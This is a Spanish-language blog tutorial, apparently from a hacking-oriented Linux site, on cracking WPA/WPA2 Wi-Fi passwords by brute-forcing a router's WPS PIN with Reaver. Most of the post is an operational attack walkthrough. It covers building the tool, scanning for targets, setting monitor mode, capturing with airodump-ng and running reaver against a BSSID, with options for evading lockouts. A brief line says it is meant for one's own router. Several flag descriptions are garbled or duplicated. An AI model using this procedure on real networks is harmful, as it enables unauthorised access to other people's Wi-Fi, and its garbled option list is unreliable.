.

Breaking News
recent

-

Tutorial completo de reaver [Hack Wifi WPA WPA2]

Tutorial completo de reaver [Hack Wifi WPA WPA2]
Hackear

Hola compañeros de mundo linux!!!
Bienvenidos a mi nuevo pos !!

En esta ocación vamos a ver un tutorial completo del uso de Reaver.
Antes de empezar puedes descargarte este tutorial completo en pdf pinchando aqui.

¿Qué es Reaver?
Reaver es un software que se utiliza por terminal que busca explotar la debilidad de routers con WPS activado por medio de un ataque de fuerza bruta
probando todas las posibilidades hasta que encuentra el pin del router y no brinda la contraseña del mismo.

¿Para qué sirve el Reaver?
Sirve para conseguir la password WPA o WPA2 de un router sin necesidad de diccionarios.
El Reaver debe utilizarce solo con nuestro propio router
terminal

¿Cómo se instala Reaver?

wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz

tar -xvf reaver-1.4.tar.gz

cd reaver-1.4/src

./configure 
make 
make install



¿Cómo se usa Reaver?
Esta es la parte principal del post, vamos a ver detalladamente su uso y funciones.
En mi caso esw wlan0, pero puede variar


Paso 1:
Ser root

sudo su

Paso 2:
Escanear en busca de redes con WPS activo

iw wlan0 scan

Despues del escaneo digamos que vamos a atacar una red llamada "Stbangm" con BSSID "20:aa:4b:20:a4:9f" y esta en el canal 11.

Paso 3:
Poner nuestra tarjeta Wifi en modo monitor.

airmon-ng start wlan0

Paso 4:
Dar de baja nuestra tarjeta wlan0

ifconfig wlan0 down

Paso 5:
Ponemos nuestra tarjeta en modo de "ataque"

airodump-ng mon0 -w wps-test --beacons --channel 11 --bssid 20:aa:4b:20:a4:9f

COMANDOS DEL REAVER:
Antes de seguir tenemos que ver los comandos que le podemos dar al Reaver para que funcione y cumpla con algunas cosillas más:

-Comandos requeridos

-i tarjeta en modo monitor | Definimos la tarjeta que esta en modo monitor. Ejm: reaver i- mon0
-b BSSID de atacar | Ponemos la BSSID de el router a atacar. Ejm: reaver -b 20:aa:4b:20:a4:9f

-Comandos opcionales (De estos no voy a dar ejemlos porque no son necesarios)

-m | MAC del sistema.
-e | ESSID del router a atacar es decir, el nombre de la red.
-c | Canal del router a atacar.
-o | Ponemos el nombre de un archivo al que Rever va dandonos su log.
-s | Restaurar una sesión especifica a restaurar (Nombre del archivo)
-c | Ejecuta el comando dado al terminar el trabajo
-a | Detecta y usa automaticamente las opciones avanzadas recomendadas por Reaver
-n | Reporta errores no-criticos
-q | Solo reporta errores críticos
-h | Muestra la ayuda.
-p | Empieza por el pin que le digamos, ya sean 4 u 8 dígitos
-d | Define un tiempo en segundos entre cada intendo de pin
-l | Ajusta el tiempo de espera si el router se bloquea
-g | Cancela el ataque despues de cierta cantidad de intentos.
-x | Define el tiempo de espera despues de 10 intentos.
-r | Descansa cierto tiempo cada cierta cantidad de intentos.
-A | No asocia con el router si consigue la password, solo da la password.
-N | No envia mensajes de NACK.
-L | Ignora mensajes de bloqueo del router a atacar.

Paso 6: (Esto debe hacerse en otra terminal como root.)
Atacar con Reaver.
Esta es la parte más interesante de todo el proceso, ya que acá es donde el ataque sale y tardeo temprano nos dara la pass del router.
Esta parte puede durar hasta 7 días dependiendo del router a atacar, la señal y los bloqueos.
En mi caso estoy atacando un router Linksys pero me bloque 1 minuto cada 5 intentos y llevo 3 dias y apenas lleva el 45%, otros router bloquean hasta 24 horas.

reaver -i mon0 -b 20:aa:4b:20:a4:9f

Este codigo puede combinarse con todos los comando que puse arriba, otro ejemplo seria:

reaver -i mon0 -b 34:08:04:0e:53:f2 -a -c 11 -N -d 5

No he terinado con el ataque aun, pero les dejo una captura de como voy:

Wifi

Recuerden que el ejemplo lo hice con mis datos y que ustedes deben reemplazarlos con los suyos.

NOTAS IMPORTANTES:

-No todos los router tienen WPS. En el paso 1 vemos como saber si tienen o no el WPS.
-Este proceso solo funciona con router con seguridad WPA y WPA2, con WPE hay otro metodo.
-No todos los routers con WPS se pueden atacar, algunos más nuevos y más caros no reciben este tipo de ataques.
-No todas las tarjetas son compatibles con Reaver (En el sitio oficial de Reaver dan una lista de dispositivos no compatibles)
-Les quedo debiendo las imagenes pero todavia no termina entonces cuando saque la password las subo

Y bueno, esto es todo por ahora, les pido que recomienden el post y que si tienen dudas, comentarios o problemas los escriban abajo.

Saludos,

SI QUIERES DESCARGARTE ESTE TUTORIAL EN PDF CLICK AQUI
 
mr de

mr de

1 comentario:

-

Con la tecnología de Blogger.